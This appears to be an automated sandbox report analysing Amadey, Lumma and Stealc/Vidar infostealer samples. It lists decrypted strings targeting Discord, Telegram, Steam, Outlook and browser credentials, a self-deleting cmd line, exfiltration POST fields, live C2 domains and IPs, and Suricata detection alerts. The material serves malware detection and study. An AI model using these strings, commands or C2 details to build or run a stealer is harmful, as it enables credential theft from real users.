Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: nss3.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: softokn3.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: vcruntime140.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \Temp\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: .exe
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: runas
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: open
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: /c start
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %DESKTOP%
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %APPDATA%
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %USERPROFILE%
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %DOCUMENTS%
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: %RECENT%
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: *.lnk
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: files
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \discord\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \Telegram Desktop\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: key_datas
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: map*
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Telegram
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Tox
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: *.tox
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: *.ini
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Password
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: 00000001
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: 00000002
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: 00000003
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: 00000004
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Pidgin
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \.purple\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: accounts.xml
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: token:
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Software\Valve\Steam
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: SteamPath
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \config\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ssfn*
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: config.vdf
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: DialogConfig.vdf
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: libraryfolders.vdf
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: loginusers.vdf
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \Steam\
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: sqlite3.dll
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: browsers
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: done
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: soft
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: https
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: POST
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: HTTP/1.1
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: hwid
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: build
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: token
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: file_name
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: file
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: message
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 14.2.7fb3e2a1d2.exe.b10000.0.unpack	String decryptor: screenshot.jpg
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: reinfomarbke.site
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: monopuncdz.site
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: unityshootsz.site
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: moeventmynz.site
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: plaintifuf.site
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: honerstyzu.site
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: bringlanejk.site
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: uppermixturyz.site
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: terracedjz.cyou
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: - Screen Resoluton:
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: Workgroup: -
Source: 10.2.pisos23.exe.400000.0.unpack	String decryptor: FATE99--test

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:50070 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 40.126.32.74:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50001 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.74:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50023 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50210 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50212 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50235 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.5:50237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50240 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50241 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50308 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.69.116.108:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50323 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50328 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50329 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50331 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50337 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50376 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50377 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50380 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.5:50379 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50385 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.5:50386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:50389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50411 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50410 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50407 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50419 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50452 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50451 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.5:50472 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.5:50483 version: TLS 1.2

Source:	Binary string: my_library.pdbU source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000B3C000.00000040.00000001.01000000.0000000C.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.2960979403.00000000051CB000.00000004.00001000.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3420827049.000000000880B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000B3C000.00000040.00000001.01000000.0000000C.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.2960979403.00000000051CB000.00000004.00001000.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3420827049.000000000880B000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe

Directory queried: number of queries: 2526

Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B1C9C7 FindFirstFileExW,		7_2_00B1C9C7
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B1CA78 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		7_2_00B1CA78

Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: chrome.exe	Memory has grown: Private usage: 1MB later: 36MB
Source: firefox.exe	Memory has grown: Private usage: 1MB later: 187MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49925 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49940
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49984 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:62631 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:57689 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:64380 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:64374 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:61824 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:49999 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50000 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50001 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50005 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50007 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50011 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50013 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50014 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50017 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:50017 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:63506 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:50017
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50018 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:50017 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:50017
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:50017 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:57960 -> 1.1.1.1:53
